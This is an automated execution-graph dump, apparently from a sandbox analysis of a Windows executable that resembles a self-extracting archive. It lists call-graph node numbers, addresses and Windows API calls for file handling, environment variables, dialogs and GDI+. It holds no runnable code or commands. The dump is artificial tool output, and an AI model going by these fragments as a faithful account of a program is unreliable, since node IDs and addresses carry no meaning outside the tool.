                                                                                        execution_graph 25353 37f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25394 37ff30 LocalFree 24115 38bb30 24116 38bb39 24115->24116 24117 38bb42 24115->24117 24119 38ba27 24116->24119 24120 3897e5 _abort 38 API calls 24119->24120 24121 38ba34 24120->24121 24139 38bb4e 24121->24139 24123 38ba3c 24148 38b7bb 24123->24148 24126 38ba53 24126->24117 24129 38ba96 24132 388dcc _free 20 API calls 24129->24132 24132->24126 24133 38ba91 24172 3891a8 20 API calls _free 24133->24172 24135 38bada 24135->24129 24173 38b691 26 API calls 24135->24173 24136 38baae 24136->24135 24137 388dcc _free 20 API calls 24136->24137 24137->24135 24140 38bb5a __FrameHandler3::FrameUnwindToState 24139->24140 24141 3897e5 _abort 38 API calls 24140->24141 24143 38bb64 24141->24143 24146 38bbe8 _abort 24143->24146 24147 388dcc _free 20 API calls 24143->24147 24174 388d24 38 API calls _abort 24143->24174 24175 38ac31 EnterCriticalSection 24143->24175 24176 38bbdf LeaveCriticalSection _abort 24143->24176 24146->24123 24147->24143 24149 384636 __cftof 38 API calls 24148->24149 24150 38b7cd 24149->24150 24151 38b7dc GetOEMCP 24150->24151 24152 38b7ee 24150->24152 24154 38b805 24151->24154 24153 38b7f3 GetACP 24152->24153 24152->24154 24153->24154 24154->24126 24155 388e06 24154->24155 24156 388e44 24155->24156 24160 388e14 _abort 24155->24160 24178 3891a8 20 API calls _free 24156->24178 24158 388e2f RtlAllocateHeap 24159 388e42 24158->24159 24158->24160 24159->24129 24162 38bbf0 24159->24162 24160->24156 24160->24158 24177 387a5e 7 API calls 2 library calls 24160->24177 24163 38b7bb 40 API calls 24162->24163 24164 38bc0f 24163->24164 24167 38bc60 IsValidCodePage 24164->24167 24169 38bc16 24164->24169 24171 38bc85 _abort 24164->24171 24165 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24166 38ba89 24165->24166 24166->24133 24166->24136 24168 38bc72 GetCPInfo 24167->24168 24167->24169 24168->24169 24168->24171 24169->24165 24179 38b893 GetCPInfo 24171->24179 24172->24129 24173->24129 24175->24143 24176->24143 24177->24160 24178->24159 24180 38b977 24179->24180 24184 38b8cd 24179->24184 24183 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24180->24183 24186 38ba23 24183->24186 24189 38c988 24184->24189 24186->24169 24188 38ab78 __vsnwprintf_l 43 API calls 24188->24180 24190 384636 __cftof 38 API calls 24189->24190 24191 38c9a8 MultiByteToWideChar 24190->24191 24193 38c9e6 24191->24193 24194 38ca7e 24191->24194 24196 388e06 __vsnwprintf_l 21 API calls 24193->24196 24200 38ca07 _abort __vsnwprintf_l 24193->24200 24195 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24194->24195 24197 38b92e 24195->24197 24196->24200 24203 38ab78 24197->24203 24198 38ca78 24208 38abc3 20 API calls _free 24198->24208 24200->24198 24201 38ca4c MultiByteToWideChar 24200->24201 24201->24198 24202 38ca68 GetStringTypeW 24201->24202 24202->24198 24204 384636 __cftof 38 API calls 24203->24204 24205 38ab8b 24204->24205 24209 38a95b 24205->24209 24208->24194 24210 38a976 __vsnwprintf_l 24209->24210 24211 38a99c MultiByteToWideChar 24210->24211 24212 38a9c6 24211->24212 24223 38ab50 24211->24223 24213 38a9e7 __vsnwprintf_l 24212->24213 24218 388e06 __vsnwprintf_l 21 API calls 24212->24218 24216 38aa9c 24213->24216 24217 38aa30 MultiByteToWideChar 24213->24217 24214 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24215 38ab63 24214->24215 24215->24188 24245 38abc3 20 API calls _free 24216->24245 24217->24216 24219 38aa49 24217->24219 24218->24213 24236 38af6c 24219->24236 24223->24214 24224 38aaab 24226 388e06 __vsnwprintf_l 21 API calls 24224->24226 24230 38aacc __vsnwprintf_l 24224->24230 24225 38aa73 24225->24216 24227 38af6c __vsnwprintf_l 11 API calls 24225->24227 24226->24230 24227->24216 24228 38ab41 24244 38abc3 20 API calls _free 24228->24244 24230->24228 24231 38af6c __vsnwprintf_l 11 API calls 24230->24231 24232 38ab20 24231->24232 24232->24228 24233 38ab2f WideCharToMultiByte 24232->24233 24233->24228 24234 38ab6f 24233->24234 24246 38abc3 20 API calls _free 24234->24246 24237 38ac98 _abort 5 API calls 24236->24237 24238 38af93 24237->24238 24239 38af9c 24238->24239 24247 38aff4 10 API calls 3 library calls 24238->24247 24242 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24239->24242 24241 38afdc LCMapStringW 24241->24239 24243 38aa60 24242->24243 24243->24216 24243->24224 24243->24225 24244->24216 24245->24223 24246->24216 24247->24241 25318 38c030 GetProcessHeap 25354 38b4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25319 361025 29 API calls 25379 37c220 93 API calls _swprintf 25322 38f421 21 API calls __vsnwprintf_l 25397 361710 86 API calls 25356 37ad10 73 API calls 25325 37a400 GdipDisposeImage GdipFree 25380 37d600 70 API calls 25326 386000 QueryPerformanceFrequency QueryPerformanceCounter 25358 382900 6 API calls 4 library calls 25381 38f200 51 API calls 25399 38a700 21 API calls 24271 369a74 24275 369a7e 24271->24275 24272 369ab1 24273 369b9d SetFilePointer 24273->24272 24274 369bb6 GetLastError 24273->24274 24274->24272 24275->24272 24275->24273 24276 369b79 24275->24276 24278 36981a 24275->24278 24276->24273 24279 369833 24278->24279 24281 369e80 79 API calls 24279->24281 24280 369865 24280->24276 24281->24280 25328 361075 84 API calls 25400 361f72 128 API calls __EH_prolog 25329 37a070 10 API calls 25382 37b270 99 API calls 24308 369f7a 24309 369f8f 24308->24309 24310 369f88 24308->24310 24311 369f9c GetStdHandle 24309->24311 24318 369fab 24309->24318 24311->24318 24312 36a003 WriteFile 24312->24318 24313 369fd4 WriteFile 24314 369fcf 24313->24314 24313->24318 24314->24313 24314->24318 24316 36a095 24320 366e98 77 API calls 24316->24320 24318->24310 24318->24312 24318->24313 24318->24314 24318->24316 24319 366baa 78 API calls 24318->24319 24319->24318 24320->24310 25383 388268 55 API calls _free 25402 387f6e 52 API calls 2 library calls 25332 37c793 107 API calls 5 library calls 25333 37e455 14 API calls ___delayLoadHelper2@8 25241 37cd58 25242 37cd7b _wcschr 25241->25242 25243 37ce22 25241->25243 25242->25243 25248 371fbb CompareStringW 25242->25248 25257 37c793 _wcslen _wcsrchr 25243->25257 25269 37d78f 25243->25269 25244 37b314 ExpandEnvironmentStringsW 25244->25257 25246 37d40a 25248->25242 25249 37ca67 SetWindowTextW 25249->25257 25252 383e3e 22 API calls 25252->25257 25254 37c855 SetFileAttributesW 25255 37c90f GetFileAttributesW 25254->25255 25267 37c86f _abort _wcslen 25254->25267 25255->25257 25258 37c921 DeleteFileW 25255->25258 25257->25244 25257->25246 25257->25249 25257->25252 25257->25254 25260 37cc31 GetDlgItem SetWindowTextW SendMessageW 25257->25260 25263 37cc71 SendMessageW 25257->25263 25268 371fbb CompareStringW 25257->25268 25291 37a64d GetCurrentDirectoryW 25257->25291 25293 36a5d1 6 API calls 25257->25293 25294 36a55a FindClose 25257->25294 25295 37b48e 76 API calls 2 library calls 25257->25295 25258->25257 25261 37c932 25258->25261 25260->25257 25262 364092 _swprintf 51 API calls 25261->25262 25264 37c952 GetFileAttributesW 25262->25264 25263->25257 25264->25261 25265 37c967 MoveFileW 25264->25265 25265->25257 25266 37c97f MoveFileExW 25265->25266 25266->25257 25267->25255 25267->25257 25292 36b991 51 API calls 3 library calls 25267->25292 25268->25257 25273 37d799 _abort _wcslen 25269->25273 25270 37d9e7 25270->25257 25271 37d9c0 25271->25270 25277 37d9de ShowWindow 25271->25277 25272 37d8a5 25275 36a231 3 API calls 25272->25275 25273->25270 25273->25271 25273->25272 25296 371fbb CompareStringW 25273->25296 25276 37d8ba 25275->25276 25279 37d8d1 25276->25279 25297 36b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25276->25297 25277->25270 25279->25270 25280 37d925 25279->25280 25281 37d97b CloseHandle 25279->25281 25285 37d91b ShowWindow 25279->25285 25298 37dc3b 6 API calls 25280->25298 25282 37d989 25281->25282 25283 37d994 25281->25283 25299 371fbb CompareStringW 25282->25299 25283->25271 25285->25280 25287 37d93d 25287->25281 25288 37d950 GetExitCodeProcess 25287->25288 25288->25281 25289 37d963 25288->25289 25289->25281 25291->25257 25292->25267 25293->25257 25294->25257 25295->25257 25296->25272 25297->25279 25298->25287 25299->25283 25335 37a440 GdipCloneImage GdipAlloc 25385 383a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25404 391f40 CloseHandle 23368 37f3b2 23369 37f3be __FrameHandler3::FrameUnwindToState 23368->23369 23400 37eed7 23369->23400 23371 37f3c5 23372 37f518 23371->23372 23375 37f3ef 23371->23375 23473 37f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23372->23473 23374 37f51f 23466 387f58 23374->23466 23387 37f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23375->23387 23411 388aed 23375->23411 23382 37f40e 23384 37f48f 23419 37f953 GetStartupInfoW _abort 23384->23419 23386 37f495 23420 388a3e 51 API calls 23386->23420 23387->23384 23469 387af4 38 API calls _abort 23387->23469 23389 37f49d 23421 37df1e 23389->23421 23394 37f4b1 23394->23374 23395 37f4b5 23394->23395 23396 37f4be 23395->23396 23471 387efb 28 API calls _abort 23395->23471 23472 37f048 12 API calls ___scrt_uninitialize_crt 23396->23472 23399 37f4c6 23399->23382 23401 37eee0 23400->23401 23475 37f654 IsProcessorFeaturePresent 23401->23475 23403 37eeec 23476 382a5e 23403->23476 23405 37eef1 23406 37eef5 23405->23406 23484 388977 23405->23484 23406->23371 23409 37ef0c 23409->23371 23413 388b04 23411->23413 23412 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23414 37f408 23412->23414 23413->23412 23414->23382 23415 388a91 23414->23415 23416 388ac0 23415->23416 23417 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23416->23417 23418 388ae9 23417->23418 23418->23387 23419->23386 23420->23389 23622 370863 23421->23622 23425 37df3d 23671 37ac16 23425->23671 23427 37df46 _abort 23428 37df59 GetCommandLineW 23427->23428 23429 37dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23428->23429 23430 37df68 23428->23430 23686 364092 23429->23686 23675 37c5c4 23430->23675 23436 37df76 OpenFileMappingW 23440 37dfd6 CloseHandle 23436->23440 23441 37df8f MapViewOfFile 23436->23441 23437 37dfe0 23680 37dbde 23437->23680 23440->23429 23443 37dfa0 __InternalCxxFrameHandler 23441->23443 23444 37dfcd UnmapViewOfFile 23441->23444 23448 37dbde 2 API calls 23443->23448 23444->23440 23449 37dfbc 23448->23449 23449->23444 23450 3790b7 8 API calls 23451 37e0aa DialogBoxParamW 23450->23451 23452 37e0e4 23451->23452 23453 37e0f6 Sleep 23452->23453 23454 37e0fd 23452->23454 23453->23454 23456 37e10b 23454->23456 23719 37ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23454->23719 23457 37e12a DeleteObject 23456->23457 23458 37e146 23457->23458 23459 37e13f DeleteObject 23457->23459 23460 37e177 23458->23460 23461 37e189 23458->23461 23459->23458 23720 37dc3b 6 API calls 23460->23720 23716 37ac7c 23461->23716 23463 37e17d CloseHandle 23463->23461 23465 37e1c3 23470 37f993 GetModuleHandleW 23465->23470 24003 387cd5 23466->24003 23469->23384 23470->23394 23471->23396 23472->23399 23473->23374 23475->23403 23488 383b07 23476->23488 23479 382a67 23479->23405 23481 382a6f 23482 382a7a 23481->23482 23502 383b43 DeleteCriticalSection 23481->23502 23482->23405 23531 38c05a 23484->23531 23487 382a7d 7 API calls 2 library calls 23487->23406 23489 383b10 23488->23489 23491 383b39 23489->23491 23492 382a63 23489->23492 23503 383d46 23489->23503 23508 383b43 DeleteCriticalSection 23491->23508 23492->23479 23494 382b8c 23492->23494 23524 383c57 23494->23524 23498 382baf 23499 382bbc 23498->23499 23530 382bbf 6 API calls ___vcrt_FlsFree 23498->23530 23499->23481 23501 382ba1 23501->23481 23502->23479 23509 383c0d 23503->23509 23506 383d7e InitializeCriticalSectionAndSpinCount 23507 383d69 23506->23507 23507->23489 23508->23492 23510 383c26 23509->23510 23514 383c4f 23509->23514 23510->23514 23516 383b72 23510->23516 23513 383c3b GetProcAddress 23513->23514 23515 383c49 23513->23515 23514->23506 23514->23507 23515->23514 23517 383b7e ___vcrt_FlsGetValue 23516->23517 23518 383bf3 23517->23518 23519 383b95 LoadLibraryExW 23517->23519 23523 383bd5 LoadLibraryExW 23517->23523 23518->23513 23518->23514 23520 383bfa 23519->23520 23521 383bb3 GetLastError 23519->23521 23520->23518 23522 383c02 FreeLibrary 23520->23522 23521->23517 23522->23518 23523->23517 23523->23520 23525 383c0d ___vcrt_FlsGetValue 5 API calls 23524->23525 23526 383c71 23525->23526 23527 383c8a TlsAlloc 23526->23527 23528 382b96 23526->23528 23528->23501 23529 383d08 6 API calls ___vcrt_FlsGetValue 23528->23529 23529->23498 23530->23501 23534 38c077 23531->23534 23535 38c073 23531->23535 23533 37eefe 23533->23409 23533->23487 23534->23535 23537 38a6a0 23534->23537 23549 37fbbc 23535->23549 23538 38a6ac __FrameHandler3::FrameUnwindToState 23537->23538 23556 38ac31 EnterCriticalSection 23538->23556 23540 38a6b3 23557 38c528 23540->23557 23542 38a6c2 23548 38a6d1 23542->23548 23570 38a529 29 API calls 23542->23570 23545 38a6e2 _abort 23545->23534 23546 38a6cc 23571 38a5df GetStdHandle GetFileType 23546->23571 23572 38a6ed LeaveCriticalSection _abort 23548->23572 23550 37fbc5 IsProcessorFeaturePresent 23549->23550 23551 37fbc4 23549->23551 23553 37fc07 23550->23553 23551->23533 23621 37fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23553->23621 23555 37fcea 23555->23533 23556->23540 23558 38c534 __FrameHandler3::FrameUnwindToState 23557->23558 23559 38c558 23558->23559 23560 38c541 23558->23560 23573 38ac31 EnterCriticalSection 23559->23573 23581 3891a8 20 API calls _free 23560->23581 23563 38c564 23566 38c590 23563->23566 23574 38c479 23563->23574 23564 38c546 23582 389087 26 API calls __cftof 23564->23582 23583 38c5b7 LeaveCriticalSection _abort 23566->23583 23567 38c550 _abort 23567->23542 23570->23546 23571->23548 23572->23545 23573->23563 23584 38b136 23574->23584 23576 38c48b 23580 38c498 23576->23580 23591 38af0a 23576->23591 23578 38c4ea 23578->23563 23598 388dcc 23580->23598 23581->23564 23582->23567 23583->23567 23589 38b143 _abort 23584->23589 23585 38b183 23605 3891a8 20 API calls _free 23585->23605 23586 38b16e RtlAllocateHeap 23587 38b181 23586->23587 23586->23589 23587->23576 23589->23585 23589->23586 23604 387a5e 7 API calls 2 library calls 23589->23604 23606 38ac98 23591->23606 23594 38af4f InitializeCriticalSectionAndSpinCount 23597 38af3a 23594->23597 23595 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23596 38af66 23595->23596 23596->23576 23597->23595 23599 388dd7 RtlFreeHeap 23598->23599 23603 388e00 _free 23598->23603 23600 388dec 23599->23600 23599->23603 23620 3891a8 20 API calls _free 23600->23620 23602 388df2 GetLastError 23602->23603 23603->23578 23604->23589 23605->23587 23607 38acc8 23606->23607 23611 38acc4 23606->23611 23607->23594 23607->23597 23608 38ace8 23608->23607 23610 38acf4 GetProcAddress 23608->23610 23612 38ad04 _abort 23610->23612 23611->23607 23611->23608 23613 38ad34 23611->23613 23612->23607 23614 38ad4a 23613->23614 23615 38ad55 LoadLibraryExW 23613->23615 23614->23611 23616 38ad8a 23615->23616 23617 38ad72 GetLastError 23615->23617 23616->23614 23618 38ada1 FreeLibrary 23616->23618 23617->23616 23619 38ad7d LoadLibraryExW 23617->23619 23618->23614 23619->23616 23620->23602 23621->23555 23721 37ec50 23622->23721 23625 3708e7 23627 370c14 GetModuleFileNameW 23625->23627 23732 3875fb 42 API calls __vsnwprintf_l 23625->23732 23626 370888 GetProcAddress 23628 3708a1 23626->23628 23629 3708b9 GetProcAddress 23626->23629 23638 370c32 23627->23638 23628->23629 23631 3708cb 23629->23631 23631->23625 23632 370b54 23632->23627 23633 370b5f GetModuleFileNameW CreateFileW 23632->23633 23634 370b8f SetFilePointer 23633->23634 23635 370c08 CloseHandle 23633->23635 23634->23635 23636 370b9d ReadFile 23634->23636 23635->23627 23636->23635 23640 370bbb 23636->23640 23641 370c94 GetFileAttributesW 23638->23641 23643 370c5d CompareStringW 23638->23643 23644 370cac 23638->23644 23723 36b146 23638->23723 23726 37081b 23638->23726 23640->23635 23642 37081b 2 API calls 23640->23642 23641->23638 23641->23644 23642->23640 23643->23638 23645 370cb7 23644->23645 23648 370cec 23644->23648 23647 370cd0 GetFileAttributesW 23645->23647 23649 370ce8 23645->23649 23646 370dfb 23670 37a64d GetCurrentDirectoryW 23646->23670 23647->23645 23647->23649 23648->23646 23650 36b146 GetVersionExW 23648->23650 23649->23648 23651 370d06 23650->23651 23652 370d73 23651->23652 23653 370d0d 23651->23653 23655 364092 _swprintf 51 API calls 23652->23655 23654 37081b 2 API calls 23653->23654 23656 370d17 23654->23656 23657 370d9b AllocConsole 23655->23657 23660 37081b 2 API calls 23656->23660 23658 370df3 ExitProcess 23657->23658 23659 370da8 GetCurrentProcessId AttachConsole 23657->23659 23737 383e13 23659->23737 23662 370d21 23660->23662 23733 36e617 23662->23733 23663 370dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23663->23658 23666 364092 _swprintf 51 API calls 23667 370d4f 23666->23667 23668 36e617 53 API calls 23667->23668 23669 370d5e 23668->23669 23669->23658 23670->23425 23672 37081b 2 API calls 23671->23672 23673 37ac2a OleInitialize 23672->23673 23674 37ac4d GdiplusStartup SHGetMalloc 23673->23674 23674->23427 23679 37c5ce 23675->23679 23676 37c6e4 23676->23436 23676->23437 23678 371fac CharUpperW 23678->23679 23679->23676 23679->23678 23762 36f3fa 82 API calls 2 library calls 23679->23762 23681 37ec50 23680->23681 23682 37dbeb SetEnvironmentVariableW 23681->23682 23684 37dc0e 23682->23684 23683 37dc36 23683->23429 23684->23683 23685 37dc2a SetEnvironmentVariableW 23684->23685 23685->23683 23763 364065 23686->23763 23689 37b6dd LoadBitmapW 23690 37b6fe 23689->23690 23691 37b70b GetObjectW 23689->23691 23831 37a6c2 FindResourceW 23690->23831 23693 37b71a 23691->23693 23826 37a5c6 23693->23826 23697 37b770 23708 36da42 23697->23708 23698 37b74c 23845 37a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23698->23845 23699 37a6c2 12 API calls 23701 37b73d 23699->23701 23701->23698 23703 37b743 DeleteObject 23701->23703 23702 37b754 23846 37a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23702->23846 23703->23698 23705 37b75d 23847 37a80c 8 API calls 23705->23847 23707 37b764 DeleteObject 23707->23697 23858 36da67 23708->23858 23713 3790b7 23991 37eb38 23713->23991 23717 37acab GdiplusShutdown OleUninitialize 23716->23717 23717->23465 23719->23456 23720->23463 23722 37086d GetModuleHandleW 23721->23722 23722->23625 23722->23626 23724 36b196 23723->23724 23725 36b15a GetVersionExW 23723->23725 23724->23638 23725->23724 23727 37ec50 23726->23727 23728 370828 GetSystemDirectoryW 23727->23728 23729 370840 23728->23729 23730 37085e 23728->23730 23731 370851 LoadLibraryW 23729->23731 23730->23638 23731->23730 23732->23632 23734 36e627 23733->23734 23739 36e648 23734->23739 23738 383e1b 23737->23738 23738->23663 23738->23738 23745 36d9b0 23739->23745 23742 36e645 23742->23666 23743 36e66b LoadStringW 23743->23742 23744 36e682 LoadStringW 23743->23744 23744->23742 23750 36d8ec 23745->23750 23747 36d9cd 23749 36d9e2 23747->23749 23758 36d9f0 26 API calls 23747->23758 23749->23742 23749->23743 23751 36d904 23750->23751 23757 36d984 _strncpy 23750->23757 23753 36d928 23751->23753 23759 371da7 WideCharToMultiByte 23751->23759 23756 36d959 23753->23756 23760 36e5b1 50 API calls __vsnprintf 23753->23760 23761 386159 26 API calls 3 library calls 23756->23761 23757->23747 23758->23749 23759->23753 23760->23756 23761->23757 23762->23679 23764 36407c __vsnwprintf_l 23763->23764 23767 385fd4 23764->23767 23770 384097 23767->23770 23771 3840bf 23770->23771 23772 3840d7 23770->23772 23787 3891a8 20 API calls _free 23771->23787 23772->23771 23774 3840df 23772->23774 23789 384636 23774->23789 23775 3840c4 23788 389087 26 API calls __cftof 23775->23788 23779 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23782 364086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23779->23782 23781 384167 23798 3849e6 51 API calls 3 library calls 23781->23798 23782->23689 23785 3840cf 23785->23779 23786 384172 23799 3846b9 20 API calls _free 23786->23799 23787->23775 23788->23785 23790 384653 23789->23790 23796 3840ef 23789->23796 23790->23796 23800 3897e5 GetLastError 23790->23800 23792 384674 23820 38993a 38 API calls __cftof 23792->23820 23794 38468d 23821 389967 38 API calls __cftof 23794->23821 23797 384601 20 API calls 2 library calls 23796->23797 23797->23781 23798->23786 23799->23785 23801 3897fb 23800->23801 23802 389801 23800->23802 23822 38ae5b 11 API calls 2 library calls 23801->23822 23804 38b136 _abort 20 API calls 23802->23804 23806 389850 SetLastError 23802->23806 23805 389813 23804->23805 23807 38981b 23805->23807 23823 38aeb1 11 API calls 2 library calls 23805->23823 23806->23792 23809 388dcc _free 20 API calls 23807->23809 23811 389821 23809->23811 23810 389830 23810->23807 23812 389837 23810->23812 23814 38985c SetLastError 23811->23814 23824 389649 20 API calls _abort 23812->23824 23825 388d24 38 API calls _abort 23814->23825 23815 389842 23817 388dcc _free 20 API calls 23815->23817 23819 389849 23817->23819 23819->23806 23819->23814 23820->23794 23821->23796 23822->23802 23823->23810 23824->23815 23848 37a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23826->23848 23828 37a5cd 23830 37a5d9 23828->23830 23849 37a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23828->23849 23830->23697 23830->23698 23830->23699 23832 37a6e5 SizeofResource 23831->23832 23833 37a7d3 23831->23833 23832->23833 23834 37a6fc LoadResource 23832->23834 23833->23691 23833->23693 23834->23833 23835 37a711 LockResource 23834->23835 23835->23833 23836 37a722 GlobalAlloc 23835->23836 23836->23833 23837 37a73d GlobalLock 23836->23837 23838 37a7cc GlobalFree 23837->23838 23839 37a74c __InternalCxxFrameHandler 23837->23839 23838->23833 23840 37a7c5 GlobalUnlock 23839->23840 23850 37a626 GdipAlloc 23839->23850 23840->23838 23843 37a7b0 23843->23840 23844 37a79a GdipCreateHBITMAPFromBitmap 23844->23843 23845->23702 23846->23705 23847->23707 23848->23828 23849->23830 23851 37a645 23850->23851 23852 37a638 23850->23852 23851->23840 23851->23843 23851->23844 23854 37a3b9 23852->23854 23855 37a3e1 GdipCreateBitmapFromStream 23854->23855 23856 37a3da GdipCreateBitmapFromStreamICM 23854->23856 23857 37a3e6 23855->23857 23856->23857 23857->23851 23859 36da75 _wcschr __EH_prolog 23858->23859 23860 36daa4 GetModuleFileNameW 23859->23860 23861 36dad5 23859->23861 23862 36dabe 23860->23862 23904 3698e0 23861->23904 23862->23861 23864 36db31 23915 386310 23864->23915 23866 36e261 78 API calls 23869 36db05 23866->23869 23869->23864 23869->23866 23882 36dd4a 23869->23882 23870 36db44 23871 386310 26 API calls 23870->23871 23879 36db56 ___vcrt_FlsGetValue 23871->23879 23872 36dc85 23872->23882 23951 369d70 81 API calls 23872->23951 23876 36dc9f ___std_exception_copy 23877 369bd0 82 API calls 23876->23877 23876->23882 23880 36dcc8 ___std_exception_copy 23877->23880 23879->23872 23879->23882 23929 369e80 23879->23929 23945 369bd0 23879->23945 23950 369d70 81 API calls 23879->23950 23880->23882 23900 36dcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 23880->23900 23952 371b84 MultiByteToWideChar 23880->23952 23938 36959a 23882->23938 23883 36e159 23890 36e1de 23883->23890 23958 388cce 26 API calls 2 library calls 23883->23958 23886 36e16e 23959 387625 26 API calls 2 library calls 23886->23959 23888 36e1c6 23960 36e27c 78 API calls 23888->23960 23889 36e214 23893 386310 26 API calls 23889->23893 23890->23889 23892 36e261 78 API calls 23890->23892 23892->23890 23894 36e22d 23893->23894 23895 386310 26 API calls 23894->23895 23895->23882 23897 371da7 WideCharToMultiByte 23897->23900 23900->23882 23900->23883 23900->23897 23953 36e5b1 50 API calls __vsnprintf 23900->23953 23954 386159 26 API calls 3 library calls 23900->23954 23955 388cce 26 API calls 2 library calls 23900->23955 23956 387625 26 API calls 2 library calls 23900->23956 23957 36e27c 78 API calls 23900->23957 23902 36e29e GetModuleHandleW FindResourceW 23903 36da55 23902->23903 23903->23713 23905 3698ea 23904->23905 23906 36994b CreateFileW 23905->23906 23907 36996c GetLastError 23906->23907 23910 3699bb 23906->23910 23961 36bb03 23907->23961 23909 36998c 23909->23910 23912 369990 CreateFileW GetLastError 23909->23912 23911 3699ff 23910->23911 23913 3699e5 SetFileTime 23910->23913 23911->23869 23912->23910 23914 3699b5 23912->23914 23913->23911 23914->23910 23916 386349 23915->23916 23917 38634d 23916->23917 23928 386375 23916->23928 23965 3891a8 20 API calls _free 23917->23965 23919 386699 23922 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23919->23922 23920 386352 23966 389087 26 API calls __cftof 23920->23966 23923 3866a6 23922->23923 23923->23870 23924 38635d 23925 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23924->23925 23927 386369 23925->23927 23927->23870 23928->23919 23967 386230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23928->23967 23930 369e92 23929->23930 23935 369ea5 23929->23935 23931 369eb0 23930->23931 23968 366d5b 77 API calls 23930->23968 23931->23879 23932 369eb8 SetFilePointer 23932->23931 23934 369ed4 GetLastError 23932->23934 23934->23931 23936 369ede 23934->23936 23935->23931 23935->23932 23936->23931 23969 366d5b 77 API calls 23936->23969 23939 3695cf 23938->23939 23940 3695be 23938->23940 23939->23902 23940->23939 23941 3695d1 23940->23941 23942 3695ca 23940->23942 23975 369620 23941->23975 23970 36974e 23942->23970 23946 369bdc 23945->23946 23948 369be3 23945->23948 23946->23879 23948->23946 23949 369785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 23948->23949 23990 366d1a 77 API calls 23948->23990 23949->23948 23950->23879 23951->23876 23952->23900 23953->23900 23954->23900 23955->23900 23956->23900 23957->23900 23958->23886 23959->23888 23960->23890 23962 36bb10 _wcslen 23961->23962 23963 36bbb8 GetCurrentDirectoryW 23962->23963 23964 36bb39 _wcslen 23962->23964 23963->23964 23964->23909 23965->23920 23966->23924 23967->23928 23968->23935 23969->23931 23971 369781 23970->23971 23972 369757 23970->23972 23971->23939 23972->23971 23981 36a1e0 23972->23981 23976 36964a 23975->23976 23977 36962c 23975->23977 23978 369669 23976->23978 23989 366bd5 76 API calls 23976->23989 23977->23976 23979 369638 FindCloseChangeNotification 23977->23979 23978->23939 23979->23976 23982 37ec50 23981->23982 23983 36a1ed DeleteFileW 23982->23983 23984 36a200 23983->23984 23985 36977f 23983->23985 23986 36bb03 GetCurrentDirectoryW 23984->23986 23985->23939 23987 36a214 23986->23987 23987->23985 23988 36a218 DeleteFileW 23987->23988 23988->23985 23989->23978 23990->23948 23993 37eb3d ___std_exception_copy 23991->23993 23992 3790d6 23992->23450 23993->23992 23996 37eb59 23993->23996 24000 387a5e 7 API calls 2 library calls 23993->24000 23995 37f5c9 24002 38238d RaiseException 23995->24002 23996->23995 24001 38238d RaiseException 23996->24001 23999 37f5e6 24000->23993 24001->23995 24002->23999 24004 387ce1 _abort 24003->24004 24005 387ce8 24004->24005 24006 387cfa 24004->24006 24039 387e2f GetModuleHandleW 24005->24039 24027 38ac31 EnterCriticalSection 24006->24027 24009 387ced 24009->24006 24040 387e73 GetModuleHandleExW 24009->24040 24010 387d9f 24028 387ddf 24010->24028 24013 387d76 24016 387d8e 24013->24016 24022 388a91 _abort 5 API calls 24013->24022 24023 388a91 _abort 5 API calls 24016->24023 24017 387de8 24049 392390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24017->24049 24018 387dbc 24031 387dee 24018->24031 24022->24016 24023->24010 24024 387d01 24024->24010 24024->24013 24048 3887e0 20 API calls _abort 24024->24048 24027->24024 24050 38ac81 LeaveCriticalSection 24028->24050 24030 387db8 24030->24017 24030->24018 24051 38b076 24031->24051 24034 387e1c 24037 387e73 _abort 8 API calls 24034->24037 24035 387dfc GetPEB 24035->24034 24036 387e0c GetCurrentProcess TerminateProcess 24035->24036 24036->24034 24038 387e24 ExitProcess 24037->24038 24039->24009 24041 387e9d GetProcAddress 24040->24041 24042 387ec0 24040->24042 24043 387eb2 24041->24043 24044 387ecf 24042->24044 24045 387ec6 FreeLibrary 24042->24045 24043->24042 24046 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24044->24046 24045->24044 24047 387cf9 24046->24047 24047->24006 24048->24013 24050->24030 24052 38b09b 24051->24052 24053 38b091 24051->24053 24054 38ac98 _abort 5 API calls 24052->24054 24055 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24053->24055 